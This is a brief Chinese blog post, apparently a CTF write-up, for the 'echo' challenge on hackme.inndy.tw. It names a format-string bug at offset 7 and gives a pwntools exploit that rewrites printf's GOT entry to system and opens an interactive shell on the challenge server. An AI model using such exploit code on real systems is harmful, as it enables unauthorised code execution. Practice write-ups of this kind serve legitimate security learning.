echo

作者: 2mpossible | 来源:发表于2018-08-17 16:15 被阅读0次

教科书般的格式化字符串漏洞,先找到偏移为7

然后将prinf_got地址改成system地址即可

exp:

from pwn import * 

#p = process('./echo')
p = remote('hackme.inndy.tw',7711)
elf = ELF('./echo')
offset = 7
printf_got = elf.got['printf']
system_addr = elf.plt['system']

payload = fmtstr_payload(offset,{printf_got:system_addr})
p.sendline(payload)

p.interactive()

相关文章

网友评论

      本文标题:echo

      本文链接:https://www.haomeiwen.com/subject/ziktiftx.html